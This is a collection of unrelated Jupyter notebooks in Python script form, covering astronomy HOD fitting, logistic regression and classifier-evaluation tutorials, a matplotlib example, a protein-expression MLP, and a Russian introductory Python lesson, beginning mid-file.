12.72747382, 14.24964974, 0.55068739, 0.18672767, # 14.00597843, 1.06836772, 12.88931659]) # # names = ['logMmin', 'logMlin', 'sigma_logM', 'f_cen', 'logM1', 'alpha', 'logMcut'] # hod_params = dict(zip(names, MAP)) # + if not AB: pass else: MAP = np.array([ 12.87956269, 12.24461447, 0.5345765, 13.98105124, 1.04527197]) ['$\\log{M_{min}}$', '$\\log{M_0}$', '$\\sigma_{log{M}}$', '$\\log{M_1}$', '$\\alpha$'] names = ['logMmin', 'logM0', 'sigma_logM', 'logM1', 'alpha'] hod_params = dict(zip(names, MAP)) # - ab_params = {'mean_occupation_centrals_assembias_param1':0.4, 'mean_occupation_satellites_assembias_slope1':3,\ 'mean_occupation_satellites_assembias_param1':-0.5, 'mean_occupation_centrals_assembias_slope1':3,} sats_model.param_dict.update(cens_model.param_dict) # + param_dict = hod_params #param_dict.update(ab_params) cens_model.param_dict.update(param_dict) sats_model.param_dict.update(param_dict) params = sats_model.param_dict.keys() ######################## params.remove('f_c') #######################3 ndim = len(params) # - halo_table = cat.halocat.halo_table[cat.halocat.halo_table['halo_mvir'] > min_ptcl*cat.pmass] detected_central_ids = set(catalog[catalog['halo_upid']==-1]['halo_id']) from collections import Counter def compute_occupations(halo_table): #halo_table = cat.halocat.halo_table[cat.halocat.halo_table['halo_mvir'] > min_ptcl*cat.pmass] cens_occ = np.zeros((np.sum(halo_table['halo_upid'] == -1),)) #cens_occ = np.zeros((len(halo_table),)) sats_occ = np.zeros_like(cens_occ) detected_central_ids = set(catalog[catalog['halo_upid']==-1]['halo_id']) detected_satellite_upids = Counter(catalog[catalog['halo_upid']!=-1]['halo_upid']) for idx, row in enumerate(halo_table[halo_table['halo_upid'] == -1]): cens_occ[idx] = 1.0 if row['halo_id'] in detected_central_ids else 0.0 sats_occ[idx]+= detected_satellite_upids[row['halo_id']] return cens_occ, sats_occ from halotools.utils.table_utils import compute_prim_haloprop_bins def compute_hod(masses, centrals, satellites, mass_bins): mass_bin_idxs = compute_prim_haloprop_bins(prim_haloprop_bin_boundaries=mass_bins, prim_haloprop = masses) mass_bin_nos = set(mass_bin_idxs) cens_occ = np.zeros((mass_bins.shape[0]-1,)) sats_occ = np.zeros_like(cens_occ) for mb in mass_bin_nos: indices_of_mb = np.where(mass_bin_idxs == mb)[0] denom = len(indices_of_mb) #TODO what to do about bout 0 mean std's? cens_occ[mb-1] = np.mean(centrals[indices_of_mb]) sats_occ[mb-1] = np.mean(satellites[indices_of_mb]) return cens_occ, sats_occ mass_bin_range = (9,16) mass_bin_size = 0.1 mass_bins = np.logspace(mass_bin_range[0], mass_bin_range[1], int( (mass_bin_range[1]-mass_bin_range[0])/mass_bin_size )+1 ) mbc = (mass_bins[1:]+mass_bins[:-1])/2 cens_occ, sats_occ = compute_occupations(halo_table ) mock_masses = halo_table[halo_table['halo_upid']==-1]['halo_mvir'] #mock_concentrations = halo_table[halo_table['halo_upid']==-1]['halo_nfw_conc'] # + active="" # from halotools.utils.table_utils import compute_conditional_percentiles # mock_percentiles = compute_conditional_percentiles(prim_haloprop = mock_masses, sec_haloprop = mock_concentrations, # prim_haloprop_bin_boundaries= mass_bins) # # splits = np.arange(0,1.1,0.2) # - cen_hod, sat_hod = compute_hod(mock_masses, cens_occ, sats_occ, mass_bins) # + active="" # cens_occs, sats_occs = [],[] # # for idx, p in enumerate(splits[:-1]): # split_idxs = np.logical_and(p<= mock_percentiles, mock_percentiles < splits[idx+1]) # # _cens_occ, _sats_occ = compute_hod(mock_masses[split_idxs], cens_occ[split_idxs], sats_occ[split_idxs], mass_bins) # # cens_occs.append(_cens_occ) # sats_occs.append(_sats_occ) # # #mass_bin_idxs = compute_prim_haloprop_bins(prim_haloprop_bin_boundaries=mass_bins, prim_haloprop = mock_masses[split_idxs]) # #mass_bin_nos = set(mass_bin_idxs) # # #for mb in mass_bin_nos: # # indices_of_mb = np.where(mass_bin_idxs == mb)[0] # # haloprop_grid[mb-1, idx] = np.mean(mock_concentrations[split_idxs][indices_of_mb]) # + active="" # from halotools.utils.table_utils import compute_conditional_percentile_values # sp_values = np.zeros((len(mass_bins)-1, (len(splits)-1))) # spv_median = np.zeros((len(mass_bins)-1,)) # # mass_bin_idxs = compute_prim_haloprop_bins(prim_haloprop_bin_boundaries=mass_bins, prim_haloprop = mock_masses[split_idxs]) # mass_bin_nos = set(mass_bin_idxs) # # q = ((splits[1:]+splits[:-1])/2)*100 # # for mb in mass_bin_nos: # indices_of_mb = np.where(mass_bin_idxs == mb)[0] # sp_values[mb-1, :] = np.percentile(mock_concentrations[indices_of_mb], q) # # spv_median[mb-1] = np.percentile(mock_concentrations[indices_of_mb], 50) # + active="" # for co, so, p in izip(cens_occs, sats_occs, splits[1:]): # plt.plot(mbc, co, label =p ) # # # plt.plot(mbc, cen_hod, lw = 2) # # plt.legend(loc='best') # plt.loglog() # plt.xlim([1e11,1e16]) # plt.ylim([1e-3,1.1]) # plt.show(); # + active="" # cens_model.param_dict['mean_occupation_centals_assembias_slope1'] = 1.2 # cens_model.param_dict['f_c'] = 1.0 # sats_model.param_dict['f_c'] = 1.0 # sats_model.param_dict['mean_occupation_satellites_assembias_slope1'] = 1.2 # + active="" # arg1 = np.tile(mbc, sp_values.shape[1]) # arg2 = sp_values.reshape((-1,), order = 'F') # arg3 = np.tile(spv_median, sp_values.shape[1]) # # cens_preds = cens_model.mean_occupation(prim_haloprop = arg1,\ # sec_haloprop = arg2,\ # sec_haloprop_percentile_values = arg3) # sats_preds = sats_model.mean_occupation(prim_haloprop = arg1,\ # sec_haloprop = arg2,\ # sec_haloprop_percentile_values = arg3) # # cens_preds = cens_preds.reshape((-1, sp_values.shape[1]), order = 'F') # sats_preds = sats_preds.reshape((-1, sp_values.shape[1]), order = 'F') # # for p, cp, sp, co, so in zip(splits, cens_preds.T, sats_preds.T, cens_occs, sats_occs,): # plt.plot(mbc, (cp+sp)/(co+so), label = p+0.25 ) # # # plt.legend(loc='best') # plt.loglog() # plt.xlim([1e11,1e16]) # plt.ylim([1e-3,20]) # plt.show(); # - param_dict.keys() params vals = np.array([param_dict[key] for key in params]) cens_idxs = halo_table['halo_upid'] == -1 args = (params, cen_hod, sat_hod,mbc) print params test = cens_model.mean_occupation(prim_haloprop = cat.halocat.halo_table['halo_mvir'][:100],\ sec_haloprop= cat.halocat.halo_table['halo_nfw_conc'][:100]) print np.mean(test) mbc.shape resids(vals, *args) lazy_wrapper(resids, vals, func_args = args,maxfev = 500, print_level = 1, artol = 1e-6) print params print MAP
notebooks/Fit HOD Directly SJ.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # ### Regularized logistic regression # + ##================ Part 0: Reading data and plotting ==================# import pandas as pd import numpy as np data = pd.read_csv('ex2data2.txt') X = np.vstack([data.x1,data.x2]).T y = data.y import matplotlib.pyplot as plt import plot_utils print 'Plotting data with green circle indicating (y=1) examples and red circle indicating (y=0) examples ...' plot_utils.plot_twoclass_data(X,y,'Chip Test 1', 'Chip Test 2',['y=0','y=1']) plt.show() #plt.savefig('fig3.pdf') # + #================ Part 1: Compute cost and gradient ==================# # open logistic_regressor.py and implement the regularized loss function # and gradient # map the features in ex2data2.txt into a pth order polynomial import sklearn from sklearn.preprocessing import PolynomialFeatures # Map X onto polynomial features and normalize p = 6 poly = sklearn.preprocessing.PolynomialFeatures(degree=p,include_bias=False) X_poly = poly.fit_transform(X) # set up the data matrix (expanded basis functions) with the column of ones as intercept XX = np.vstack([np.ones((X_poly.shape[0],)),X_poly.T]).T # set up a regularized logistic regression model from logistic_regressor import RegLogisticRegressor reg_lr1 = RegLogisticRegressor() # run fmin on the loss function and gradient reg = 1.0 theta_opt = reg_lr1.train(XX,y,reg=reg,num_iters=1000,norm=False) # print the theta found and the final loss print 'Theta found by fmin_bfgs: ',theta_opt print "Final loss = ", reg_lr1.loss(theta_opt,XX,y,0.0) # plot the decision boundary plot_utils.plot_decision_boundary_poly(X,y,theta_opt,reg,p,'Chip Test 1', 'Chip Test 2',['y = 0','y = 1']) plt.show() #plt.savefig('fig4.pdf') # + # compute accuracy on training set # implement the predict method in logistic_regressor.py reg_lr1.theta = theta_opt predy = reg_lr1.predict(XX) # TODO: fill in the expression for accuracy of prediction accuracy = float(np.sum(predy == y)) / predy.shape[0] print "Accuracy on the training set = ", accuracy # - # ### Comparing learned model with sklearn's logistic ridge regression # + # Compare with model learned by sklearn's logistic regression with reg = 1/C # the regularization parameter set below can be varied (on a logarithmic scale) reg = 1 # L2 regularization with sklearn LogisticRegression from sklearn import linear_model sk_logreg_l2 = linear_model.LogisticRegression(C=1.0/reg,solver='lbfgs',fit_intercept=False) sk_logreg_l2.fit(XX,y) print "Theta found by sklearn with L2 reg: ", sk_logreg_l2.coef_[0] print "Loss with sklearn theta: ", reg_lr1.loss(sk_logreg_l2.coef_[0],XX,y,0.0) plot_utils.plot_decision_boundary_sklearn_poly(X,y,sk_logreg_l2,reg,p,'Exam 1 score', 'Exam 2 score',['Not Admitted','Admitted']) plt.show() #plt.savefig('fig4_sk.pdf') # - from sklearn import model_selection def select_lambda_crossval(X,y,lambda_low,lambda_high,lambda_step,penalty): best_lambda = lambda_low # Your code here # Implement the algorithm above. num_folds = 5 best_accuracy = 0 kf = model_selection.KFold(n_splits = num_folds) for reg in np.arange(lambda_low, lambda_high, lambda_step): accuracy = 0; for train_index, test_index in kf.split(X): X_train = X[train_index] y_train = y[train_index] X_test = X[test_index] y_test = y[test_index] if (penalty == "l2"): sk_logreg = linear_model.LogisticRegression(C=1.0/reg, solver='lbfgs',fit_intercept=False, penalty=penalty) elif (penalty == "l1"): sk_logreg = linear_model.LogisticRegression(C=1.0/reg, solver='liblinear',fit_intercept=False,penalty=penalty) else: raise ValueError("Incorrect penalty type! Penalty can only be l2 or l1.") # sk_logreg.fit(X_train, y_train) sk_logreg.fit(XX, y) # print X_train.shape y_pred = sk_logreg.predict(X_test) # y_pred = bin_features(X_test.dot(sk_logreg.coef_[0])) # print y_pred # print y_test cur_accuracy= float(np.sum(y_pred == y_test)) / y_test.shape[0] # print "lambda = ", reg, ", accuracy = ", cur_accuracy accuracy += cur_accuracy # plot_utils.plot_decision_boundary_sklearn(X_train, y_train, sk_logreg, 'Chip Test 1', 'Chip Test 2',['y = 0','y = 1']): accuracy = accuracy / num_folds print "lambda = ", reg, ", accuracy = ", accuracy if (accuracy > best_accuracy): best_accuracy = accuracy best_lamnbda = reg # end your code return best_lambda select_lambda_crossval(XX,y,0.1,2,0.1, "l2") # + from sklearn import model_selection import utils def select_lambda_crossval_1(X,y,lambda_low,lambda_high,lambda_step,penalty): best_lambda = lambda_low # Your code here # Implement the algorithm above. best_accuracy = 0.0 for reg in np.arange(lambda_low, lambda_high, lambda_step): kf = model_selection.KFold(10) accuracy = 0.0 for train_index, test_index in kf.split(X): X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index] if penalty == 'l2': sk_logreg_l2 = linear_model.LogisticRegression(penalty=penalty, C=1.0/reg,solver='lbfgs',fit_intercept=True) elif penalty == 'l1': sk_logreg_l2 = linear_model.LogisticRegression(penalty=penalty, C=1.0/reg,solver='liblinear',fit_intercept=True) else: raise ValueError("Penalty must be l1 or l2") sk_logreg_l2.fit(XX,y) predy = utils.bin_features( X_test.dot(sk_logreg_l2.coef_[0]) ) accuracy += float(np.sum(predy == y_test)) / y_test.shape[0] print reg," Accuracy: ", accuracy/10 if accuracy > best_accuracy: best_accuracy = accuracy best_lambda = reg # end your code return best_lambda select_lambda_crossval_1(XX,y, 0.1, 5,0.1,"l2") # - # ### L1 regularized logistic regre # + # L1 regularization witk sklearn LogisticRegression sk_logreg_l1 = linear_model.LogisticRegression(C=1.0/reg,solver='liblinear',fit_intercept=False,penalty='l1') sk_logreg_l1.fit(XX,y) print "Theta found by sklearn with L1 reg: ", sk_logreg_l1.coef_[0] print "Loss with sklearn theta: ", reg_lr1.loss(sk_logreg_l1.coef_[0],XX,y,0.0) # plot regularization paths for L1 regression # Exploration of L1 regularization # plot_utils.plot_regularization_path(XX,y) plt.show() #plt.savefig('fig5.pdf') # -
hw2/logreg/logreg_reg.ipynb
# --- # title: "Linear Plot with Line Formatting" # author: "Sanjay" # date: 2020-09-05 # description: "-" # type: technical_note # draft: false # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: kagglevil # language: python # name: kagglevil # --- # Importing Matplotlib library from matplotlib import pyplot as plt # Assigning values Year = [1975, 1983, 1999, 2006, 2017] TamilNadu = [130.6, 158.61, 355.54, 384.76, 754.60] Assam = [10.4, 25.56, 58.75, 178.27, 254.87] # Formatting of line style and Plotting of co-ordinates plt.plot(Year, TamilNadu, color ='orange', marker ='o', markersize = 10, label ='Tamil Nadu') plt.plot(Year, Assam, color ='g', linestyle ='dashed', linewidth = 3, label ='Assam') # Labelling the plot plt.xlabel('Years') plt.ylabel('Income in crores') plt.title('Income of Tamil Nadu and Assam') plt.legend() # Function to show the plot plt.show()
docs/python/matplotlib/Linear-Plot-with-Line-Formatting.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: 'Python 3.6.13 64-bit (''d_b'': conda)' # name: python3 # --- # + from detector import Mydetector import cv2 from utils import cv2_imshow,MyZoom,CutImg,measure from sense import get_frame img,depth,oridepth = get_frame() mz = MyZoom(img) myde = Mydetector() out = myde.predictor(mz) PredCenter = out.get_fields()['pred_keypoints'][0][5].numpy() CenterDepth = depth[int(PredCenter[0])][int(PredCenter[1])] d,l = measure(out['instances'].to("cpu"),CenterDepth)
measure.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import pandas as pd data = pd.read_csv('Data_Cortex_Nuclear.csv') data.drop(['MouseID',],axis=1, inplace=True) pd.DataFrame(data[:10]) data = data.drop(['Treatment', 'Behavior', 'class'],axis=1) data.fillna(value=0) # + data.isnull().sum() # - data.corr() import numpy as np columns = data.columns X_data = data[columns[:-1]] y_data = data[columns[-1]] X_data.replace('',np.NaN,inplace=True) from sklearn.preprocessing import Imputer imputer = Imputer() imputer.fit(X_data) #THIS IS A MUST OR THE LABELS WITH BE NUMERICAL AND THE PROTEIN EXPRESSION WILL BE UNKNOWN TO MOST OF US X_data = pd.DataFrame(columns=X_data.columns,data=imputer.transform(X_data)) pd.DataFrame(X_data[:10]) X_data.isnull().sum() X_data.corr() from sklearn.model_selection import train_test_split X_train,X_test,y_train,y_test = train_test_split(X_data,y_data,test_size=.3) print(X_train.shape) print(X_train[:5]) print(y_train.shape) print(y_train[:5]) print(X_test[:5]) print(y_test) # + from sklearn.neural_network import MLPClassifier clf = MLPClassifier(solver='adam', validation_fraction=.3,alpha=.000055, hidden_layer_sizes=(25,25,8), random_state=1,tol=.000000099,verbose=True) clf.fit(X_train, y_train) y_train.shape # - clf.score(X_test,y_test) print(clf.predict(X_test[:10])) print(y_test[:10]) pd.DataFrame(clf.predict_proba(X_test[:10])) pd.DataFrame(X_test[:3]) pd.DataFrame(y_test[:3])
MICE PROTEIN EXPRESSION.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # # Evaluating the Performance of the Classifier # # In this notebook we are going to evaluate the performance of the K-NN classifier built for the **Iron Ore** dataset. In order to have a clean notebook, some functions are implemented in the file *utils.py* (e.g., plot_learning_curve). We are not going to discuss the implementation aspects of these functions as it is not the scope, but you can explore and read the content of the functions later on. # # Summary: # - [Data Pre-processing](#data_preprocessing) # - [Building the K-Nearest Neighbors Classifier](#models) # - [Quantifying the Quality of Predictions](#pred) # - [Accuracy](#accuracy) # - [Confusion Matrix](#confusion) # - [Precision and Recall](#precision) # - [F1-score](#f1score) # - [Receiver Operating Characteristic (ROC) and Area Under the Curve (AUC)](#roc) # - [K-fold Cross-Validation](#kfold) # - [Learning Curve](#learning) # # __All the libraries used in this notebook are <font color='red'>Open Source</font>__. # ## Data Pre-processing # <a id=data_preprocessing></a> # + code_folding=[0] # Standard libraries import numpy as np # written in C, is faster and robust library for numerical and matrix operations import pandas as pd # data manipulation library, it is widely used for data analysis and relies on numpy library. import matplotlib.pyplot as plt # for plotting import seaborn as sns # plot nicely =) from sklearn.model_selection import train_test_split #split arrays or matrices into random train and test subsets from sklearn.preprocessing import StandardScaler #Standardize features by removing the mean and scaling to unit variance # Auxiliar functions from utils import * # the following to lines will tell to the python kernel to always update the kernel for every utils.py # modification, without the need of restarting the kernel. # %load_ext autoreload # %autoreload 2 # using the 'inline' backend, your matplotlib graphs will be included in your notebook, next to the code # %matplotlib inline # - # For this first example, we will work on the same dataset as the previous notebook, the **Iron Ore** dataset. # + code_folding=[0] # reading dataset df = pd.read_csv('../data/iron_ore_study.csv') # Splits from oscar Fe>60%, SiO2<9, Al2O3<2, P<0.08 split_points = [ ('FE', 60, [False, True]), ('SIO2', 9, [True, False]), ('AL2O3', 2, [True, False]), ('P', 0.08, [True, False]), ] # It's ore if everything is True df['is_ore'] = np.vstack([ pd.cut(df[elem], bins=[0, split, 100], labels=is_ore) for elem, split, is_ore in split_points ]).sum(axis=0) == 4 y = df.is_ore # set the variable 'y' to store the labels # removing is_ore from the dataframe list = ['is_ore'] df = df.drop(list,axis = 1 ) # split data train 70% and test 30%. You can try other splits here. x_train, x_test, y_train, y_test = train_test_split(df, y, test_size=0.3, random_state=42) y_train = y_train.values # converting to numpy array y_test = y_test.values # converting to numpy array # normalising the data scaler = StandardScaler() scaler.fit(x_train) # not considering the label is_ore x_train_scaled = scaler.transform(x_train) x_test_scaled = scaler.transform(x_test) # - # ## Building the K-Nearest Neighbors Classifier # <a id=models></a> # + from sklearn.neighbors import KNeighborsClassifier #Classifier implementing the k-nearest neighbors vote. clf_knn = KNeighborsClassifier(n_neighbors=3) clf_knn.fit(x_train_scaled, y_train) # - # ## Quantifying the Quality of Predictions # <a id=pred></a> # # The performance assessment of the **classifiers** is extremely important in practice, as this provide insights of how the classifier performs with new data, in which me measure the **generalisation error**. # # Summary: # - [Accuracy](#accuracy) # - [Confusion Matrix](#confusion) # - [Precision and Recall](#precision) # - [F1-score](#f1score) # - [Receiver Operating Characteristic (ROC) and Area Under the Curve (AUC)](#roc) # - [K-fold Cross-Validation](#kfold) # - [Learning Curve](#learning) # ### Accuracy # <a id=accuracy></a> # # Computes the accuracy of the classifier by using the following equation: # # $$accuracy = \frac{1}{N}\sum_{i=0}^N{1*(\hat{y}==y)}$$ # where $y$ is the true label, $\hat{y}$ the predicted label and $N$ is the number of samples. # + from sklearn.metrics import accuracy_score # we are using prediction computed previsously prediction = clf_knn.predict(x_test_scaled) accuracy_knn = accuracy_score(y_test, prediction) print('Accuracy: ', accuracy_knn) # - # Nice! We just got 97.4% of **accuracy**. Can we assume that we are done? Let's use other tools to quantify the quality of predictions for our classifier. # ### Confusion Matrix # <a id=confusion></a> # # The confusion matrix is a tool/technique for summarising the performance of the classifier. We can have better insights about when the classifier is getting right and what are the types of errors it is making. It can be very useful for a further improvement of our models. # # <img src="imgs/cm.png" alt="Drawing" style="width: 400px;"/> # # # In the image above, we have: # - **True Positive (TP):** correctly predicted event values. # - **False Positive (FP):** incorrectly predicted event values. # - **True Negative (TN):** correctly predicted no-event values. # - **False Negative (FN):** incorrectly predicted no-event values. # # + # confusion_matrix: computes confusion matrix to evaluate the accuracy of a classification from sklearn.metrics import confusion_matrix cm = confusion_matrix(y_test, prediction) sns.heatmap(cm, annot=True,fmt="d") # - # ### Precision-Recall # <a id=precision></a> # # The confusion matrix give us a lot of information, but sometimes we may need a better metric in order to evaluate the classifier accuracy. Precision and recall scores are two metrics naturally provided by confusion matrix evaluation. # # # Precision is given by the equation: # # $$precision = \frac{TP}{TP + FP}$$ # where $TP$ is the number of True Positives and $FP$ is the number of False Positives. # # # Recall is given by the equation: # # $$recall = \frac{TP}{TP + FN}$$ # where $TP$ is the number of True Positives and $FN$ is the number of False Negatives. # # # + # Libraries: # precision_score: computes precision score # recall_score: computes recall score from sklearn.metrics import precision_score, recall_score # we are using prediction computed previsously precision_knn = precision_score(y_test, prediction) recall_knn = recall_score(y_test, prediction) print('Precision: ', precision_knn) print('Recall: ', recall_knn) # - # ### F1-score # <a id=f1score></a> # # Also known as **F-Measure**, can be interpreted as a weighted average of the precision and recall. The formula for F1-score is: # # $$f_1 = 2 * \frac{precision * recall}{precision+recall}$$ # + from sklearn.metrics import f1_score # computes the f1 score # we are using prediction computed previsously f1_score_knn = f1_score(y_test, prediction) print('F1-score: ', f1_score_knn) # - # ### Receiver Operating Characteristic (ROC) and Area Under the Curve (AUC) # <a id=roc></a> # # #### Receiver Operating Characteristic (ROC) # ROC curve plot the *true positive rate-TPR* (a.k.a. *recall score*) against the *false negative rate-FPR*. FPR is the ratio of negative instances that are incorrectly classifier as positive. # # # #### Area Under the Curve (AUC) # + # Libraries: # roc_curve: computes the receiver operating characteristic curve # roc_auc_score: computes Area Under the Receiver Operating Characteristic Curve score from sklearn.metrics import roc_curve, roc_auc_score # computing and plotting the ROC curve fpr, tpr, _ = roc_curve(y_test, prediction) plot_roc_curve(fpr=fpr, tpr=tpr) # computing the AUC (Area Under the Curve) auc_knn = roc_auc_score(y_test, prediction) print('AUC: ', auc_knn) # - # ##### K-fold Cross-Validation # <a id=kfold></a> # + # We are using the library StratifiedKFold for this task. # The StratifiedKFold performs stratified sampling to produce folds that contain a representative ratio of each # class. At each iteraction the code create a clone of the classifier, train that clone on the training # folds, and makes prediction on the test fold. from sklearn.model_selection import StratifiedKFold from sklearn.base import clone cv = StratifiedKFold(n_splits=5, shuffle=True, random_state=42) auc_scores = [] f1_scores = [] for train, test in cv.split(x_train_scaled, y_train): clone_clf = clone(clf_knn) # splitting the training set x_train_folds = x_train_scaled[train] y_train_folds = y_train[train] x_test_folds = x_train_scaled[test] y_test_folds = y_train[test] # building the classifier clone_clf.fit(x_train_folds, y_train_folds) y_pred = clone_clf.predict(x_test_folds) # computing the auc score auc_scores.append(roc_auc_score(y_test_folds, y_pred)) # computing the f1-score f1_scores.append(f1_score(y_test_folds, y_pred)) fold = 1 print('Fold\tAUC\tF1-score') for auc, f1 in zip(auc_scores, f1_scores): print('{}\t{:.3f}\t{:.3f}'.format(fold, auc, f1)) fold += 1 print() print('Mean AUC: {:.3f}'.format(np.array(auc_scores).mean())) print('Mean F1-score: {:.3f}'.format(np.array(f1_scores).mean())) # - # ##### Learning Curve # <a id=learning></a> # + from sklearn.model_selection import StratifiedKFold # SVC is more expensive so we do a lower number of CV iterations: cv = StratifiedKFold(n_splits=10, shuffle=True, random_state=42) plot_learning_curve(clf_knn, title='K-NN Learning Curve', X=x_train_scaled, y=y_train, ylim=(0.85, 1.01), cv=cv, n_jobs=5) # - # #### Your Turn: # # 1) Build a classifier, you can choise a Random Forest or SVM. # 1.1) Build the classifier # # For example, for Random Forest you can do: # ```python # from sklearn.ensemble import RandomForestClassifier # implements random decision forest. # # clf_rf = RandomForestClassifier(n_estimators=20) # 20 trees in the forest. # clf_rf.fit(x_train_scaled, y_train) # ``` # 1.2) Evaluate the classifier # # In the case of Random Forest, you can do: # ```python # pred_rf = clf_rf.predict(x_test_scaled) # ``` # 2) Evaluate the performance of the classifier by using the metrics presented in this notebook: # 2.1) Precision and Recall # # For example: # ```python # precision_rf = precision_score(y_test, pred_rf) # recall_rf = recall_score(y_test, pred_rf) # # print('Precision: ', precision_rf) # print('Recall: ', recall_rf) # ``` # 2.2) F1-score # # For example: # ```python # f1_score_rf = f1_score(y_test, pred_rf) # print('F1-score: ', f1_score_rf) # ``` # 2.3) Plot the ROC curve and compute the AUC score # # For example: # ```python # # computing and plotting the ROC curve # fpr, tpr, _ = roc_curve(y_test, pred_rf) # plot_roc_curve(fpr=fpr, tpr=tpr) # # # computing the AUC (Area Under the Curve) # auc_rf = roc_auc_score(y_test, pred_rf) # print('AUC: ', auc_rf) # ``` # 3) Can we do better? # # To answer this question, compute the learning curve: # # For example: # ```python # cv = StratifiedKFold(n_splits=10, random_state=42) # # plot_learning_curve(clf_rf, title='Random Forest Learning Curve', # X=x_train_scaled, # y=y_train, # ylim=(0.85, 1.01), # cv=cv, # n_jobs=5) # ``` # # **PS: if you are using SVM, choose n_splits small**. # # # If you whish, compute the K-fold Stratified Cross validation to get better insights. # 4) Compare the evaluation results for the different classifier with the previous K-NN classifier. Could you find some insights about the performance of both classfiers?
notebooks/.ipynb_checkpoints/pm1-performance-evaluation-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # <center> # <img src="http://i0.kym-cdn.com/photos/images/original/000/234/765/b7e.jpg" height="400" width="400"> # </center> # # # Первому семинару приготовиться # __Наша цель на сегодня:__ # # * Запустить анаконду быстрее, чем за 20 минут. # * Попробовать python на вкус # * Решить пару простых задач и залить их в Яндекс.Контест # ## 0. Куда это я попал? # # __Jupyter Notebook__ - это штука для интеракктивного запуска кода в браузере. Много где используют. Можно писать код, выполнять его и смотреть на результат. # # Напиши в ячейке ниже `2 + 2` и нажми на кнопки __Shift__ и __Enter__ одновременно. Твой код выполнится и ты увидишь ответ. Дальше так и будем писать код. # напиши код прямо тут вместо трёх точек ... # > Ещё у ячеек бывает разный тип. В этой части семинара ваш семинарист немного поучит вас работать в тетрадках с Markdown. # # # ### Markdown # # - [10-минутный урок по синтаксису](https://www.markdowntutorial.com/) # - [Короткий гайд по синтаксису](https://guides.github.com/features/mastering-markdown/) # ## 1. Python как калькулятор # # Можно складывать, умножать, делить и так далее... 4 * 7 3 * (2 + 5) 5 ** 3 5 / 2 5 // 2 #Человек против машины: раунд 1, угадайте, что получится? 5 % 2 #а тут? # Как обстоят дела с другими операциями? Попробуем извлечь квадратный корень: sqrt(4) # Извлечение квадратного корня не входит в комплект математических операций, доступных в Python по умолчанию, поэтому вместо ответа мы получили какую-то непонятную ругань. # # Эта непонятная ругань называется исключением, когда-нибудь мы научимся их обрабатывать, а сейчас обратим внимание на последнюю строчку: `NameError: name 'sqrt' is not defined` — то есть «я не понимаю, что такое sqrt». Однако, не всё так плохо: соответствующая функция есть в модуле math. Чтобы ей воспользоваться, нужно импортировать этот модуль. Это можно сделать разными способами. import math math.sqrt(4) # После того, как модуль `math` импортирован, вы можете узнать, какие ещё в нём есть функции. В __IPython Notebook__ для этого достаточно ввести имя модуля, поставить точку и нажать кнопку __«Tab»__. Вот, например, синус: math.sin(0) # Приведенный синтаксис может оказаться неудобным, если вам часто приходится вызывать какие-то математические функции. Чтобы не писать каждый раз слово «math», можно импортировать из модуля конкретные функции. from math import sqrt sqrt(4) # Также можно подгрузить какой-нибудь модуль или пакет, но при этом изменить у него название на более короткое и пользоваться им. import math as mh mh.sqrt(4) # ## 2. Переменные # # Понятие «переменной» в программировании похоже на аналогичное понятие в математике. Переменная — это ячейка памяти, обозначаемая каким-то именем. В этой ячейке могут храниться числа, строки и более сложные объекты. Мы пока поработаем немножко с числовыми переменными. x = 4 x x = x + 2 x # А что будет в $x$, если запусстить ячейку ещё раз? # ## 3. Типы # # Попробуем записать числа по-разному 4 * 42 '4' * 42 #Человек против машины: раунд 2, угадайте, что получится? # Для каждого типа арифметика работает по-своему! a = 'ёж' b = 'ик' a + b type(4) type('4') type(4.0) type(True) # - `str` - текстовый # - `int` - целочисленный # - `float` - число с плавающей запятой (обычное действительное число) # - `bool` - булева переменная # Иногда можно переходить от одного типа переменной к другому. # + x = '42' print(type(x)) x = int(x) print(type(x)) # - # А иногда нет. Включайте логику :) # + x = 'Люк, я твой отец' print(type(x)) x = int(x) print(type(x)) # - # Булевы переменные возникают при разных сравнениях, их мы будем активно использовать на следующем семинаре. 2 + 2 == 4 2 + 2 == 5 x = 5 x < 8 # ## 4. Вещественные числа и погрешности # # Вещественные числа в программировании не так просты. Вот, например, посчитаем синус числа $\pi$: from math import pi, sin sin(pi) #думаете, получится 0? Ха-ха! # Непонятный ответ? Во-первых, это так называемая [компьютерная форма экспоненциальной записи чисел.](https://ru.wikipedia.org/wiki/Экспоненциальная_запись#.D0.9A.D0.BE.D0.BC.D0.BF.D1.8C.D1.8E.D1.82.D0.B5.D1.80.D0.BD.D1.8B.D0.B9_.D1.81.D0.BF.D0.BE.D1.81.D0.BE.D0.B1_.D1.8D.D0.BA.D1.81.D0.BF.D0.BE.D0.BD.D0.B5.D0.BD.D1.86.D0.B8.D0.B0.D0.BB.D1.8C.D0.BD.D0.BE.D0.B9_.D0.B7.D0.B0.D0.BF.D0.B8.D1.81.D0.B8) Она удобна, если нужно уметь записывать очень большие или очень маленькие числа:`1.2E2` означает `1.2⋅102`, то есть `1200`, а `2.4e-3` — то же самое, что `2.4⋅10−3=00024`. # # Результат, посчитанный Python для $\sin \pi$, имеет порядок `10−16` — это очень маленькое число, близкое к нулю. Почему не «настоящий» ноль? Все вычисления в вещественных числах делаются компьютером с некоторой ограниченной точностью, поэтому зачастую вместо «честных» ответов получаются такие приближенные. К этому надо быть готовым. #Человек против машины: раунд 3, угадайте, что получится? 0.4 - 0.3 == 0.1 0.4 - 0.3 # Когда сравниваете вещественные числа будьте осторожнее. # ## 5. Ввод и вывод # # Работа в Jupyter редко требует писать код, который сам по себе запрашивает данные с клавиатуры, но для других приложений (и в частности для домашних работ) это может потребоваться. К 